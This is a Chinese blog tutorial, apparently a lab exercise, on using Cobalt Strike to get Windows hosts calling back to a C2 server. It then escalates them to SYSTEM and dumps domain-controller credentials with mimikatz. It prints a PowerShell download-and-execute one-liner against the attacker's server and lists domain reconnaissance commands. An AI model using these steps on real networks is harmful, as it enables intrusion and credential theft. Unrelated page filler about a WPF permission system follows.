内网渗透-cs上线之提权测试方法

cs上线之提权测试方法

在这里我简单给大家介绍如何让目标机器上线,以及上线后如何提高系统权限的方法
这里外网渗透拿到shell的过程我就不介绍了,我直接用cs创建powershell让靶机上线
这里我们简单搭建一下环境和拓扑图
环境搭建:win7,window server 2003,kali,win10
首先我们先打开cs
打开kali服务端和win10的客服端
在这里插入图片描述
在这里插入图片描述
进入到cs
在这里插入图片描述我们打开监听器,这里怎么创建监听器就不介绍了,往期视频都有介绍
在这里插入图片描述
我们打开攻击,生成powershell
在这里插入图片描述
点击之前创建好的test监听器
在这里插入图片描述
在这里插入图片描述
开始攻击
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.222.131:80/a’))”
我们吧powershell复制到靶机上打开
在这里插入图片描述
由于window server 2003没有安装 powershell,我们无法打开,只能通过生成后门程序进行攻击
在这里插入图片描述
在这里插入图片描述
点击程序
在这里插入图片描述
程序已经运行
我们去cs上看看有没有上线了
在这里插入图片描述
靶机上线了,接下来我们就可以进入会话,以及内网信息收集的操作了
在这里插入图片描述成功查看到用户的主机信息了
我们在看看对方主机是否在域内
查看域名
shell wmic computersystem get domain
shell whoami/all
shell ipconfig/all (DNS后缀)
shell net time /domain(域控的时间)
shell nslookup (域名) 查看域控的ip地址

我们可以使用上述命令进行查看域名
在这里插入图片描述
发现是存在域的,且域名为zhian.com
在这里插入图片描述
我们在看看另一台主机也在域内
这时我们再看看哪个主机是域控,使用这个命令很快就可以分辨出来
shell net time /domain
我们对win7输入
在这里插入图片描述
发现访问不了
在访问另外一台试试
在这里插入图片描述
发现访问到了,这个主机就是域控,也就是window server 2003
我们看一下拓扑图
在这里插入图片描述
连上了两台机器,接下来就是对机器提权了,都没有达到system权限
我们提权目的是为了可以进行更高层次的信息收集,获取用户的信息
我们先是提权为*,在提权为system就可以了
我这里的步骤说一下
获得system权限的方法
(执行,提权)
先进行smb监听,发现不行,再用tcp进行监听,(tcp1-test),(uac-token-duplication),点击开始
提升到zhian* 权限
再进行tcp监听,svc-exe模块,提升到system权限

首先对zhian进行提权为zhian*
在这里插入图片描述
我们对准,点击就可以了
这里选择创建好的tcp1协议,选择(uac-token-duplication)模块
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
我们可以看到出现了新的上线主机zhian*了
我们进一步提权为system权限,我们选择svc.exe
在这里插入图片描述
点击开始
在这里插入图片描述
输入shell whoami
在这里插入图片描述
发现成功提取为system权限了,接下来对域控进行提权,因为已经是管理员权限了,我们只要提升为system权限就可以了,我们只要进行第二步选择tcp协议和svc.exe就可以了
在这里插入图片描述
成功提权为system权限了
我们看一下拓扑图
在这里插入图片描述
我们查看域控的hash值
在这里插入图片描述点击mimikatz获得明文密码
在这里插入图片描述
在这里插入图片描述
成功获取密码,只需要解密就好了。
我们对win7进行获取hash值
在这里插入图片描述
在这里插入图片描述
成功获得用户信息,实验结束。

  • 19
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
WPF (Windows Presentation Foundation)是一种针对Windows操作系统的用户界面开发框架,而cs则代表C#编程语言。权限管理系统源码则是指实现权限管理功能的软件代码。 权限管理系统是一种可以管理用户权限的软件系统,用于控制和管理用户对系统资源的访问权限。例如,一个企业内部的权限管理系统可以定义不同用户角色的权限级别,从而限制用户对不同数据和功能的访问权限。 WPF和C#是开发这样信息系统的一种常见技术选择。WPF提供了丰富的用户界面控件和可视化效果,能够提供更好的用户体验。而C#则是一种流行的编程语言,易于使用且具有强大的功能。 当开发一个权限管理系统时,可以使用WPF来构建用户界面,包括登录界面、用户管理界面、权限设置界面等。同时,使用C#编写后台逻辑,包括验证用户身份、查询数据库、处理用户请求、更新权限等功能。通过使用C#和WPF的组合,可以开发出功能强大且用户友好的权限管理系统。 系统源码是指开发这个系统所使用的代码。权限管理系统的源码可以包括各种功能模块的代码文件,如界面设计文件(XAML)、后台逻辑代码(C#)、数据库访问代码等。通过阅读源码,可以了解系统的实现细节,从而进行二次开发、定制化或修复bug等工作。 综上所述,WPF和C#是开发权限管理系统的常见选择,源码则是系统实现的具体代码。通过使用WPF和C#开发权限管理系统的源码,可以构建出功能强大且用户友好的权限管理系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值